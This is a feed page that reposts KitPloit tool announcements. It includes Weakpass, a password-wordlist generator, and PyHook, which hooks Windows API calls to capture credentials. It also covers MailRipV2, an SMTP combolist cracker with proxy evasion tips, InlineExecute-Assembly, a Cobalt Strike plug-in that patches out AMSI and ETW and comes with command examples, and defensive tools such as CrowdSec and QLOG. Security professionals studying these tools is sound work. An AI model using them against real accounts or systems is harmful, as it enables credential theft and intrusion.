RSS Security

πŸ”’
❌ About FreshRSS
There are new articles available, click to refresh the page.
Today β€” 22 September 2021KitPloit - PenTest & Hacking Tools

Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words

21 September 2021 at 11:30
By: Zion3R


The tool generates a wordlist based on a set of words entered by the user.


For example, during penetration testing, you need to gain access to some service, device, account, or Wi-Fi network that is password protected. For example, let it be the Wi-Fi network of EvilCorp. Sometimes, a password is a combination of device/network/organization name with some date, special character, etc. Therefore, it is simpler and easier to test some combinations before launching more complex and time-consuming checks. For example, cracking a Wi-Fi password with a wordlist can take several hours and can fail, even if you choose a great wordlist because there was no such password in it like Evilcorp2019.

Therefore, using the generated wordlist, it is possible to organize a targeted and effective online password check.

Link: https://zzzteph.github.io/weakpass/

Secondary: https://weakpass.com/generate


Features

The hashcat rule syntax is used to generate the wordlist. By default, the generator uses a set of rules "online.rule", which performs the following mutations:

  1. Adding special characters and popular endings to the end of the word - !,[email protected], [email protected]#, 123! etc. evilcorp!, evilcorp!123
  2. Adding digits from 1 to 31, from 01 to 12 - evilcorp01, evilcorp12.
  3. Adding the date 2018-2023 - evilcorp2018, evilcorp2019
  4. Various combinations of 1-3 - evilcorp2018!
  5. Capitalize the first letter and lower the rest, apply 1-4. Evilcorp!2021

As a result, for the word evilcorp, the following passwords will be generated (216 in total):

  • evilcorp
  • Evilcorp
  • EVILCORP
  • evilcorp123456
  • evilcorp2018
  • Evilcorp!2021
  • Evilcorp!2022
  • [email protected]#

You can use your own hashcat rules, just click "Show rules" and put in the "Rules" textarea them with the list of rules you like best. Rules that are supported (source https://hashcat.net/wiki/doku.php?id=rule_based_attack):

Name Function Description Example Rule Input Word Output Word
Nothing : Do nothing (passthrough) : [email protected] [email protected]
Lowercase l Lowercase all letters l [email protected] [email protected]
Uppercase u Uppercase all letters u [email protected] [email protected]
Capitalize c Capitalize the first letter and lower the rest c [email protected] [email protected]
Invert Capitalize C Lowercase first found character, uppercase the rest C [email protected] [email protected]
Toggle Case t Toggle the case of all characters in word. t [email protected] [email protected]
Toggle @ TN Toggle the case of characters at position N T3 [email protected] [email protected]
Reverse r Reverse the entire word r [email protected] [email protected]
Duplicate d Duplicate entire word d [email protected] [email protected]@ssW0rd
Duplicate N pN Append duplicated word N times p2 [email protected] [email protected]@[email protected]
Reflect f Duplicate word reversed f [email protected] [email protected]@p
Rotate Left { Rotate the word left. { [email protected] @ssW0rdp
Rotate Right } Rotate the word right } [email protected] [email protected]
Append Character $X Append character X to end $1 [email protected] [email protected]
Prepend Character ^X Prepend character X to front ^1 [email protected] [email protected]
Truncate left [ Delete first character [ [email protected] @ssW0rd
Trucate right ] Delete last character ] [email protected] [email protected]
Delete @ N DN Delete character at position N D3 [email protected] [email protected]
Extract range xNM Extract M characters, starting at position N x04 [email protected] [email protected]
Omit range ONM Delete M characters, starting at position N O12 [email protected] psW0rd
Insert @ N iNX Insert character X at position N i4! [email protected] [email protected]!W0rd
Overwrite @ N oNX Overwrite character at position N with X o3$ [email protected] [email protected]$W0rd
Truncate @ N 'N Truncate word at position N '6 [email protected] [email protected]
Replace sXY Replace all instances of X with Y ss$ [email protected] [email protected]$$W0rd
Purge @X Purge all instances of X @s [email protected] [email protected]
Duplicate first N zN Duplicate first character N times z2 [email protected] [email protected]
Duplicate last N ZN Duplicate last character N times Z2 [email protected] [email protected]
Duplicate all q Duplicate every character q [email protected] [email protected]@ssssWW00rrdd

The generator automatically removes duplicate passwords.

By pressing the Wi-Fi, all passwords less than 8 characters long will be automatically deleted.

All data is generated using Javascript so that you can use the generator without internet access.


How-to



  1. To generate a wordlist, enter in the Words field, words that can be used as part of the password.
  2. Click on the Generate button
  3. Copy the received content or click on the Copy to clipboard button for automatic copying.
  4. ...
  5. Profit!


Yesterday β€” 21 September 2021KitPloit - PenTest & Hacking Tools

PyHook - An Offensive API Hooking Tool Written In Python Designed To Catch Various Credentials Within The API Call

21 September 2021 at 20:30
By: Zion3R


PyHook is the python implementation of my SharpHook project, It uses various API hooks in order to give us the desired credentials.

PyHook Uses frida to inject it's dependencies into the target process


Supported Processes
Process API Call Description Progress
mstsc CredUnPackAuthenticationBufferW This will hook into mstsc and should give you Username and Password DONE
runas CreateProcessWithLogonW This will hook into runas and should give you Username, Password and the domain name DONE
cmd RtlInitUnicodeStringEx This should hook into cmd and then would be able to filter keywords like: PsExec,password etc.. DONE
MobaXterm CharUpperBuffA This will hook into MobaXterm and should give you credentials for SSH and RDP logins DONE
explorer (UAC Prompt) CredUnPackAuthenticationBufferW This will hook into explorer and should give you Username, Password and the Domain name from the UAC Prompt DONE


Link my blog post covering this topic: https://ilankalendarov.github.io/posts/offensive-hooking



MailRipV2 - Improved SMTP Checker / SMTP Cracker With Proxy-Support, Inbox Test And Many More Features

21 September 2021 at 11:30
By: Zion3R


Your SMTP checker / SMTP cracker for mailpass combolists including features like: proxy-support (SOCKS4 / SOCKS5) with automatic proxy-scraper and checker, e-mail delivery / inbox check and DNS lookup for unknown SMTP-hosts. Made for easy usage and always working!


Overview

Legal Notices

You are ONLY allowed to use the following code for educational purposes! Mail.Rip V2 shall not be used for any kind of illegal activity nor law enforcement at any time. This restriction applies to all cases of usage, no matter whether the code as a whole or only parts of it are being used.

By downloading and / or using any part of the code and / or any file of this repository, you agree to this restriction without remarks.


Features

Mail.Rip v2 is a SMTP checker / SMTP cracker written in Python 3.8. Using the "smtplib", it allows you to check common mailpass combolists for valid SMTP logins. It has included dictionaries and lists containing details of common email providers as well as most common ports used for SMTP servers. In case any data is missing, "dnspython" is used to lookup unknown SMTP hosts in MX records.

Moreover, Mail.Rip V2 comes with SOCKS-proxy support including a proxy-scraper and checker function. If the proxy-support is activated, the checker / cracker scrapes SOCKS4 or SOCKS5 proxys from common online sources and will check the results, then.. The working proxys will be used randomly. And you can add new sources by editing the library.json at any time.

Last but not least, Mail.Rip V2 includes an email delivery test / inbox check for found SMTP logins. For every valid combo, it tries to send a plain text email with the found SMTP login. All test messages are sent to your own user-defined receiving address whereby the content of the test emails is generated randomly. The templates can be edited in the "library.json", too.

Mail.Rip V2 is full functional and ready to use!


How-to use Mail.Rip V2

Mail.Rip V2 has been written and tested with Python 3.8. It should run on any OS as long as Python and all dependencies are installed.
Just follow the steps below!


Installing needed Python modules

All Python modules / packages needed are listed in the txt-file requirements.txt. For an easy installation, type:

pip3 install -r requirements.txt

Installing any missing dependencies may take some time. Be patient, please.


Start the Checker / Cracker

With all dependencies being installed, you can start Mail.Rip V2 with:

python3 MailRipV2.py

No extra arguments are needed. You only need to copy your combofile into the same directory before starting the checker / cracker. After starting it, just follow the steps from (1) to (4). For more information see "Options in Main Menu".

Please regard:
Your combofile needs to be encoded with utf-8! Any other encoding may cause errors.


Options in Main Menu

[1] Set Default Values

Use this option to edit the default values for Mail.Rip V2. You can edit the following here:

  • Amount of threads to use for checking / cracking.
  • Default timeout for connections.
  • De-/activate the blacklist check for email domains.
  • Set your email address as receiver for test messages.


[2] De-/Activate Proxy-Support

This option allows you to activate or deactivate the proxy-support. If activated, you will be asked for the proxy-type to use. Just enter SOCKS4 or SOCKS5. The scraper starts automatically then. You can add more sources by editing the library.json. After the scraping is done, you will be asked whether you want to skip the checker. DO NOT SKIP THE CHECKER except you really, really need to start an attack immediately.


[3] Load Combos

Option #3 starts the Comboloader. Enter the name of your combofile, for example: combos.txt. All combos in the file will be loaded and prepared for an attack. Therefor, the Comboloader performs the following steps:

  • Any other separator than ":" is replaced.
  • The email address in the combo is verified by its format using regular expressions.
  • For verified email addresses, the domain is checked against the blacklist included in library.json.
  • Then, the loader checks whether it has already loaded the given combo before (duplicates check).

All combos passing the checks will be loaded for an attack and saved to a txt-file called targets.txt. Please make sure that your combofile is encoded with utf-8 or errors may occur.


[4] Start Attack

This one is obvious.


Various

See the sections below for any tips, hints and other information.


SMTP cracking / SMTP checking process

Mail.Rip V2 uses the smtplib for the checking / cracking process. The "magic" is done this way:

  1. The SMTP cracker / SMTP checker reads the next combo from the list loaded.
  2. It looks up the email domain in the "smtphost" dictionary for the SMTP-host to attack.
  3. For unknown hosts, it will try to get the address from the MX records of the email domain.
  4. The connection port for host found in MX records is searched using the most common ones in a trial and error process.
  5. Afterwards it establishes a connection to the SMTP host (trying SSL and non-SSL as well as TLS)
  6. and sends the login data using the target email address and the given password from the combo.
  7. If the login is denied, the cracker / checker will try to login with the user-ID (email without @...) and the password.
  8. In case the login data is valid, the so-called "hit" will be saved to a txt-file.
  9. In the end Mail.Rip V2 will try to send a test message to you using the found SMTP.

For best results every user should edit the host information in the library.json before starting Mail.Rip V2 the first time. Adding the data of the most common e-mail providers in a combolist will always speed up the checking / cracking process. And it will probably raise less security flags on the server-side.

Other ways to improve your results are: deactivating the proxy-support and adjusting default values. In fact, IT IS RECOMMENDED TO LEAVE THE PROXY-SUPPORT DEACTIVATED. Without using proxys, you will receive much better results - for the checker as well as for the inbox check.


Notes on the email delivery test (inbox check)

The email content is generated randomly using templates in the "library.json". Edit those templates for your needs. Editing the templates from time to time will provide a higher success rate.

Always regard that the email delivery test may return false negative results for many reasons. It just confirms that the given SMTP host can be used for sending emails with any software. Well-known email providers may block or restrict access to SMTP accounts, especially for tools like Mail.Rip V2. Moreover, free proxys may be blacklisted as well as the certain SMTP account itself. You should test valid logins for which the delivery test failed again after the attack has been finished.


Notes on the blacklist check

The library.json includes a blacklist for email domains. More than 500 trashmail domains have been added to it. But there are also some very popular email providers on it. Those email providers are most often a waste of time when you check or crack mailpass combolists. Sometimes they just block the access, sometimes they ask for further verification.

If you want to attack those providers, too, edit the blacklist for your needs.


Support Mail.Rip V2

If you like Mail.Rip V2 support it, please! Every donation helps. Or just buy me coffee! The more coffee I drink the more time I can spend on projects like this one. Just use the wallets (BTC / LTC) below for your donation. All donations are appreciated - no matter how much you send. A single Dollar can keep me awake for one or two hours ... ;-)


Donation wallets

  • BTC (Bitcoin): 1CU8WukMCDmeBfqJpsR4Vq9kxvNiRdYhf5
  • LTC (Litecoin): LeJsHzcMixhvR1qEfgHJU32joVAJDgQwR7


Last Update

2021-03-27: release X - FINAL VERSION! See commit comments for further details.



Before yesterdayKitPloit - PenTest & Hacking Tools

CrowdSec - An Open-Source Massively Multiplayer Firewall Able To Analyze Visitor Behavior And Provide An Adapted Response To All Kinds Of Attacks

20 September 2021 at 20:30
By: Zion3R


CrowdSec is a free, modern & collaborative behavior detection engine, coupled with a global IP reputation network. It stacks on fail2ban's philosophy but is IPV6 compatible and 60x faster (Go vs Python), uses Grok patterns to parse logs and YAML scenario to identify behaviors. CrowdSec is engineered for modern Cloud / Containers / VM based infrastructures (by decoupling detection and remediation). Once detected you can remedy threats with various bouncers (firewall block, nginx http 403, Captchas, etc.) while the aggressive IP can be sent to CrowdSec for curation before being shared among all users to further improve everyone's security. See FAQ or read bellow for more.


2 mins install

Installing it through the Package system of your OS is the easiest way to proceed. Otherwise, you can install it from source.


From package (Debian)
curl -s https://packagecloud.io/install/repositories/crowdsec/crowdsec/script.deb.sh | sudo bash
sudo apt-get update
sudo apt-get install crowdsec

From package (rhel/centos/amazon linux)
curl -s https://packagecloud.io/install/repositories/crowdsec/crowdsec/script.rpm.sh | sudo bash
yum install crowdsec

From package (FreeBSD)
sudo pkg update
sudo pkg install crowdsec

From source
wget https://github.com/crowdsecurity/crowdsec/releases/latest/download/crowdsec-release.tgz
tar xzvf crowdsec-release.tgz
cd crowdsec-v* && sudo ./wizard.sh -i

About the CrowdSec project

Crowdsec is an open-source, lightweight software, detecting peers with aggressive behaviors to prevent them from accessing your systems. Its user friendly design and assistance offers a low technical barrier of entry and nevertheless a high security gain.

Processing is done in 4 steps:


Once an unwanted behavior is detected, deal with it through a bouncer. The aggressive IP, scenario triggered and timestamp are sent for curation, to avoid poisoning & false positives. (This can be disabled). If verified, this IP is then redistributed to all CrowdSec users running the same scenario.


Outnumbering hackers all together

By sharing the threat they faced, all users are protecting each-others (hence the name Crowd-Security). Crowdsec is designed for modern infrastructures, with its "Detect Here, Remedy There" approach, letting you analyse logs coming from several sources in one place and block threats at various levels (applicative, system, infrastructural) of your stack.

CrowdSec ships by default with scenarios (brute force, port scan, web scan, etc.) adapted for most context, but you can easily extend it by picking more of them from the HUB. It is also easy to adapt an existing one or create one yourself.


What it is not

CrowdSec is not a SIEM, storing your logs (neither locally nor remotely). Your data are analyzed locally and forgotten.

Signals sent to the curation platform are limited to the very strict minimum: IP, Scenario, Timestamp. They are only used to allow the system to spot new rogue IPs, rule out false positives or poisoning attempts.


Install it !

Crowdsec is available for various platforms :

Or look directly at installation documentation for other methods and platforms.



PS2EXE - Module To Compile Powershell Scripts To Executables

20 September 2021 at 11:30
By: Zion3R


Overworking of the great script of Ingo Karstein with GUI support. The GUI output and input is activated with one switch, real windows executables are generated. With Powershell 5.x support and graphical front end.

Module version.


You find the script based version here (https://github.com/MScholtes/TechNet-Gallery) and here: PS2EXE-GUI: "Convert" PowerShell Scripts to EXE Files with GUI.

Author: Markus Scholtes

Version: 1.0.10

Date: 2021-04-10


Installation
PS C:\> Install-Module ps2exe

(on Powershell V4 you may have to install PowershellGet before) or download from here: https://www.powershellgallery.com/packages/ps2exe/.


Usage
  Invoke-ps2exe .\source.ps1 .\target.exe

or

  ps2exe .\source.ps1 .\target.exe

compiles "source.ps1" into the executable target.exe (if ".\target.exe" is omitted, output is written to ".\source.exe").

or start Win-PS2EXE for a graphical front end with

  Win-PS2EXE

Parameter
ps2exe [-inputFile] '<file_name>' [[-outputFile] '<file_name>'] [-prepareDebug]
[-x86|-x64] [-lcid <id>] [-STA|-MTA] [-noConsole] [-UNICODEEncoding]
[-credentialGUI] [-iconFile '<filename>'] [-title '<title>'] [-description '<description>']
[-company '<company>'] [-product '<product>'] [-copyright '<copyright>'] [-trademark '<trademark>']
[-version '<version>'] [-configFile] [-noOutput] [-noError] [-noVisualStyles] [-requireAdmin]
[-supportOS] [-virtualize] [-longPaths]
debugging x86 or x64 = compile for 32-bit or 64-bit runtime only lcid = location ID for the compiled executable. Current user culture if not specified STA or MTA = 'Single Thread Apartment' or 'Multi Thread Apartment' mode noConsole = the resulting executable will be a Windows Forms app without a console window UNICODEEncoding = encode output as UNICODE in console mode credentialGUI = use GUI for prompting credentials in console mode iconFile = icon file name for the compiled executable title = title information (displayed in details tab of Windows Explorer's properties dialog) description = description information (not displayed, but embedded in executable) company = company information (not displayed, but embedded in executable) product = product information (displayed in details tab of Windows Explorer's properties dialog) copyright = copyright information (displayed in details tab of Windows Explorer's properties dialog) trademark = trademark information (displayed in details tab of Windows Explorer's properties dialog) version = version information (displayed in details tab of Windows Explorer's properties dialog) configFile = write config file (<outputfile>.exe.config) noOutput = the resulting executable will generate no standard output (includes verbose and information channel) noError = the resulting executable will generate no error output (includes warning and debug channel) noVisualStyles = disable visual styles for a generated windows GUI application (only with -noConsole) requireAdmin = if UAC is enabled, compiled executable run only in elevated context (UAC dialog appears if required) supportOS = use functions of newest Windows versions (execute [Environment]::OSVersion to see the difference) virtualize = application virtualization is activated (forcing x86 runtime) longPaths = enable long paths ( > 260 characters) if enabled on OS (works only with Windows 10) ">
      inputFile = Powershell script that you want to convert to executable (file has to be UTF8 or UTF16 encoded)
outputFile = destination executable file name or folder, defaults to inputFile with extension '.exe'
prepareDebug = create helpful information for debugging
x86 or x64 = compile for 32-bit or 64-bit runtime only
lcid = location ID for the compiled executable. Current user culture if not specified
STA or MTA = 'Single Thread Apartment' or 'Multi Thread Apartment' mode
noConsole = the resulting executable will be a Windows Forms app without a console window
UNICODEEncoding = encode output as UNICODE in console mode
credentialGUI = use GUI for prompting credentials in console mode
iconFile = icon file name for the compiled executable
title = title information (displayed in details tab of Windows Explorer's properties dialog)
description = description info rmation (not displayed, but embedded in executable)
company = company information (not displayed, but embedded in executable)
product = product information (displayed in details tab of Windows Explorer's properties dialog)
copyright = copyright information (displayed in details tab of Windows Explorer's properties dialog)
trademark = trademark information (displayed in details tab of Windows Explorer's properties dialog)
version = version information (displayed in details tab of Windows Explorer's properties dialog)
configFile = write config file (<outputfile>.exe.config)
noOutput = the resulting executable will generate no standard output (includes verbose and information channel)
noError = the resulting executable will generate no error output (includes warning and debug channel)
noVisualStyles = disable visual styles for a generated windows GUI application (only with -noConsole)
requireAdmin = if UAC is enabled, compiled executable run only in elevated context (UAC dialog appears if required)
supportOS = use functions of newest Windows versions (execute [Environment]::OSVersion to see the difference)
virtualize = application virtualization is activated (forcing x86 runtime)
longPaths = enable long paths ( > 260 characters) if enabled on OS (works only with Windows 10)

A generated executable has the following reserved parameters:

-debug              Forces the executable to be debugged. It calls "System.Diagnostics.Debugger.Launch()".
-extract:<FILENAME> Extracts the powerShell script inside the executable and saves it as FILENAME.
The script will not be executed.
-wait At the end of the script execution it writes "Hit any key to exit..." and waits for a key to be pressed.
-end All following options will be passed to the script inside the executable.
All preceding options are used by the executable itself and will not be passed to the script.

Remarks

List of cmdlets not implemented:

The basic input/output commands had to be rewritten in C# for PS2EXE. Not implemented are Write-Progress in console mode (too much work) and Start-Transcript/Stop-Transcript (no proper reference implementation by Microsoft).


GUI mode output formatting:

Per default in powershell outputs of commandlets are formatted line per line (as an array of strings). When your command generates 10 lines of output and you use GUI output, 10 message boxes will appear each awaiting for an OK. To prevent this pipe your commandto the comandlet Out-String. This will convert the output to one string array with 10 lines, all output will be shown in one message box (for example: dir C:\ | Out-String).


Config files:

PS2EXE can create config files with the name of the generated executable + ".config". In most cases those config files are not necessary, they are a manifest that tells which .Net Framework version should be used. As you will usually use the actual .Net Framework, try running your excutable without the config file.


Parameter processing:

Compiled scripts process parameters like the original script does. One restriction comes from the Windows environment: for all executables all parameters have the type STRING, if there is no implicit conversion for your parameter type you have to convert explicitly in your script. You can even pipe content to the executable with the same restriction (all piped values have the type STRING).


Password security:

Never store passwords in your compiled script! One can simply decompile the script with the parameter -extract. For example

Output.exe -extract:C:\Output.ps1

will decompile the script stored in Output.exe.


Script variables:

Since PS2EXE converts a script to an executable, script related variables are not available anymore. Especially the variable $PSScriptRoot is empty.

The variable $MyInvocation is set to other values than in a script.

You can retrieve the script/executable path independant of compiled/not compiled with the following code (thanks to JacquesFS):

if ($MyInvocation.MyCommand.CommandType -eq "ExternalScript")
{ $ScriptPath = Split-Path -Parent -Path $MyInvocation.MyCommand.Definition }
else
{ $ScriptPath = Split-Path -Parent -Path ([Environment]::GetCommandLineArgs()[0])
if (!$ScriptPath){ $ScriptPath = "." } }

Window in background in -noConsole mode:

When an external window is opened in a script with -noConsole mode (i.e. for Get-Credential or for a command that needs a cmd.exe shell) the next window is opened in the background.

The reason for this is that on closing the external window windows tries to activate the parent window. Since the compiled script has no window, the parent window of the compiled script is activated instead, normally the window of Explorer or Powershell.

To work around this, $Host.UI.RawUI.FlushInputBuffer() opens an invisible window that can be activated. The following call of $Host.UI.RawUI.FlushInputBuffer() closes this window (and so on).

The following example will not open a window in the background anymore as a single call of "ipconfig | Out-String" will do:

$Host.UI.RawUI.FlushInputBuffer()
ipconfig | Out-String
$Host.UI.RawUI.FlushInputBuffer()

Changes:

1.0.10 / 2021-04-10
  • parameter outputFile now accepts a target folder (without filename)

1.0.9 / 2021-02-28
  • new parameter UNICODEEncoding to output as UNICODE
  • changed parameter debug to prepareDebug
  • finally dared to use advanced parameters

1.0.8 / 2020-10-24
  • refactored

1.0.7 / 2020-08-21
  • bug fix for simultanous progress bars in one pipeline

1.0.6 / 2020-08-10
  • prompt for choice behaves like Powershell now (console mode only)
  • (limited) support for Powershell Core (starts Windows Powershell in the background)
  • fixed processing of negative parameter values
  • support for animated progress bars (noConsole mode only)

1.0.5 / 2020-07-11
  • support for nested progress bars (noConsole mode only)

1.0.4 / 2020-04-19
  • Application.EnableVisualStyles() as default for GUI applications, new parameter -noVisualStyles to prevent this

1.0.3 / 2020-02-15
  • converted files from UTF-16 to UTF-8 to allow git diff

  • ignore control keys in secure string request in console mode


1.0.2 / 2020-01-08
  • added examples to github

1.0.1 / 2019-12-16
  • fixed "unlimited window width for GUI windows" issue in ps2exe.ps1 and Win-PS2EXE

1.0.0 / 2019-11-08
  • first stable module version

0.0.0 / 2019-09-15
  • experimental


InlineExecute-Assembly - A PoC Beacon Object File (BOF) That Allows Security Professionals To Perform In Process .NET Assembly Execution

19 September 2021 at 20:30
By: Zion3R


InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module. InlineExecute-Assembly will execute any assembly with the entry point of Main(string[] args) or Main(). This should allow you to run most released tooling without any prior modification needed.

The BOF will automatically determine which Common Language Runtime (CLR) is needed to be loaded into the process for your assembly (v2.0.50727 or v4.0.30319) prior to execution and in most cases, should exist gracefully if any issues arise. The BOF also supports several flags which allow the operator to dictate several behaviors prior to .NET execution which include, disabling AMSI via in memory patching, disabling and restoring ETW via in memory patching, customization of the CLR App Domain name to be created, whether to create and direct console output of your assembly to a named pipe or mailslot, and allows the operator to switch the default entry point of Main(string[] args) to Main(). More details on usage, use cases, and possible detections can be found below and https://sec urityintelligence.com/posts/net-execution-inlineexecute-assembly/.

Lastly the advantage of executing our .NET assemblies in the same process as our beacon implant is that we avoid the default behavior of Cobalt Strike's execute-assembly module which creates a new process to then load/inject the CLR/.NET assembly. However, other opsec considerations still exist, for example, does the process we are executing within normally load the CLR or does the .NET assembly we are executing have any known signatures? Therefore, the disadvantage is that if something does get detected and killed, for example by AMSI, your beacon is also killed.


Subject References

This tool wouldn't exist without being able to piggyback off some really great research, tools, and code already published by members of the security community. So thank you. Lastly, if you feel anyone has been left out below, please let me know and I will be sure to get them added.

  • HostingCLR - here - CLR/Executing assembly logic
  • Dotnet-Loader-Shellcode - (by @modexpblog) - here - All around great research including on COM Interfaces for executing .NET in C -> Real MVP
  • Donut - (by @TheRealWover and @modexpblog) - here - COM Interfaces Header
  • Memory Patching AMSI Bypass - (by @_RastaMouse) - here - AMSI memory patching research
  • Metasploit-Execute-Assembly - (by @b4rtik) - here - Modified AMSI patching and used find .NET version function
  • ExecuteAssembly - (by @med0x2e)- here - Modified aggressor script
  • Hiding Your .NET ETW - (by @xpn) - here - Great ETW research
  • ETW BOF - (by @ajpc500)- here - Modified ETW patching
  • ExecuteAssembly_Mailslot - (by @N4k3dTurtl3)- here - Modified using mailslots for console redirection
  • @freefirex2 - Was kind enough to share some good BOF inner workings and gotcha's.

Getting Started
  1. Copy the inlineExecute-Assembly folder with all of its contents to a system you plan to connect with via the Cobalt Strike GUI application.
  2. Load in the inlineExecute-Assembly.cna Aggressor script
  3. Run inlineExecute-Assembly --dotnetassembly /path/to/assembly.exe for most basic execution (see use cases below for specific flag examples)

Build Your Own

Run the below command inside the src directory via x64 Native Tools Command Prompt for VS 2019

cl.exe /c inlineExecute-Assembly.c /GS- /FoinlineExecute-Assemblyx64.o

Run the below command inside the src directory via x86 Native Tools Command Prompt for VS 2019

cl.exe /c inlineExecute-Assembly.c /GS- /FoinlineExecute-Assemblyx86.o

Flags
--dotnetassembly        Directory path to your assembly **required**
--assemblyargs Assembly arguments to pass
--appdomain Change default name of AppDomain sent (default value is totesLegit and is set via the included aggressor script) *Domain always unloaded*
--amsi Attempts to disable AMSI via in memory patching (If successful AMSI will be disabled for the entire life of process)
--etw Attempts to disable ETW via in memory patching (If successful ETW will be disabled for the entire life of process unless reverted)
--revertetw Attempts to disable ETW via in memory patching and then repatches it back to original state
--pipe Change default name of named pipe (default value is totesLegit and is set via the included aggressor script)
--mailslot Switches to using mailslots to redirect console output. Changes default name of mailslot (If left blank, d efault value is totesLegit and is set via the included aggressor script)
--main Changes entry point to Main() (default value is Main(string[] args))


Use Case

Execute .NET assembly


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe

Use Case

Execute .NET assembly with arguments


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker

Use Case

Execute .NET assembly with arguments and disable AMSI


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi

Use Case

Execute .NET assembly with arguments and disable ETW


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw

Use Case

Execute .NET assembly with arguments and redirect output via mailslots instead of the default named pipe


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --mailslot

Use Case

Execute .NET assembly with arguments and change the default named pipe name set in the aggressor script


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --pipe forRealLegit

Use Case

Execute .NET assembly and change the default app domain set in the aggressor script


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --appdomain forRealLegit

Use Case

Execute .NET assembly with Main() entry point instead of the default Main(string[] args)


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/simpleMain.exe --main

Use Case

Go HAM


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi --etw --appdomain forRealLegit --mailslot forRealLegit

Caveats
  1. While I have tried to make this as stable as possible, there are no guarantees things will never crash and beacons won’t die. We don’t have the added luxury of fork and run where if something goes wrong our beacon lives. This is the tradeoff with BOFs. With that said, I can’t stress how important it is that you test your assemblies beforehand to make sure they will work properly with the tool.
  2. Since the BOF is executed in process and takes over the beacon while running, this should be taken into account before being used for long running assemblies. If you choose to run something that will take a long time to get back results, your beacon will not be active to run more commands till the results come back and your assembly finishes running. This also doesn’t adhere to sleep set. For example, if your sleep is set at 10 minutes and you run the BOF, you will get results back as soon as the BOF finishes executing.
  3. Unless modification is done to tools that load PE’s in memory (e.g., SafetyKatz), these will most likely kill your beacon. Many of these tools work fine with execute assembly because they are able to send their console output from the sacrificial process before exiting. When they exit via our in process BOF, they kill our process, which kills our beacon. These can be modified to work but I would advise running these types of assemblies via execute assembly since other non-OPSEC friendly things could be loaded into your process that don’t get removed.
  4. If your assembly uses Environment.Exit this will need to be removed as it will kill the process and beacon.
  5. Named pipes and mail slots need to be unique. If you don’t receive data back and your beacon is still alive, the issue is most likely you need to select a different named pipe or mail slot name.

Detection

Some detection and mitigation strategies that could be used:

  1. Uses PAGE_EXECUTE_READWRITE when performing AMSI and ETW memory patching. This was done on purpose and should be a red flag as very few programs have memory ranges with the memory protection of PAGE_EXECUTE_READWRITE.
  2. Default name of named pipe created is totesLegit. This was done on purpose and signature detections could be used to flag this.
  3. Default name of mailslot created is totesLegit. This was done on purpose and signature detections could be used to flag this.
  4. Default name of AppDomain loaded is totesLegit. This was done on purpose and signature detections could be used to flag this.
  5. Good tips on detecting malicious use of .NET (by @bohops) here, (by F-Secure) here, and here
  6. Looking for .NET CLR loading into suspicious processes, such as unmanaged processes which should never have the CLR loaded.
  7. Event Tracing here
  8. Looking for other known Cobalt Strike Beacon IOC's or C2 egress/communication IOC's.


QLOG - Windows Security Logging

19 September 2021 at 11:30
By: Zion3R


QLOG provides enriched Event Logging for security related events on Windows based systems. It is under heavy development and currently in alpha state. QLOG doesn’t use API hooks and it doesn’t require a driver to be installed on the target system, QLOG only uses ETW to retrieve its telemetry. Currently QLOG supports β€œprocess create” events only, but other enriched events will follow soon. QLOG runs as a Windows Services, but can also run in console mode, if you want to stream the enriched events to console directly.


How does it work

QLOG reads from ETW, enriches events and writes enriched events to Event Channel β€œQLOG”. It creates and uses a new event source named β€œQMonitor” to write to Windows Eventlog.

Here is sequence of event processing:

  • Create ETW session & Subscribe to relevant kernel and userland ETW providers
  • Read Events from ETW providers
  • Enrich Events
  • Write enriched events to eventlog channel QLOG

Development & License

QLOG is being developed by threathunters.io community and will be open sourced once it reaches production grade maturity.


Why we created QLOG?

Sysmon does a great job, but we wanted to create a tool which is open source and doesn't require drivers to be installed on target systems. Also, Sysmon is NOT SUPPORTED by Microsoft at all. So, if you run into problems in prod, you're at your own. Sure, QLOG doesn't have support either, but it will be open sourced so we can fix issues with the power of the security community and develop new features based on the requirements of the community.


Usage & install

QLOG requires .NET Framework >=4.7.2 to be installed.

To run in interactive console mode, just run

qlog.exe

To install / deinstall as Windows service, run:

#install service
qlog.exe -i

#deinstall service
qlog.exe -u

Do you want to contribute?

Please see https://threathunters.io/ on how to join threathunters.io community.


Example output of enriched PROCESS CREATE events
{
"EventGuid": "68795fe8-67e7-410b-a5c0-8364746d7ffe",
"StartTime": "2021-07-11T11:06:56.9621746+02:00",
"QEventID": 100,
"QType": "Process Create",
"Username": "TESTOS\\TESTUSER",
"Imagefilename": "TEAMS.EXE",
"KernelImagefilename": "TEAMS.EXE",
"OriginalFilename": "TEAMS.EXE",
"Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
"PID": 21740,
"Commandline": "\"C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe\" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1668,499009601563875864,12511830007210419647,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=de --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=\"C:\\Users \\jocke",
"Modulecount": 41,
"TTPHash": "42AC63285408F5FD91668B16F8E9157FD97046AB63E84117A14E31A188DDC62F",
"Imphash": "F14F00FA1D4C82B933279C1A28957252",
"sha256": "155625190ECAA90E596CB258A07382184DB738F6EDB626FEE4B9652FA4EC1CC2",
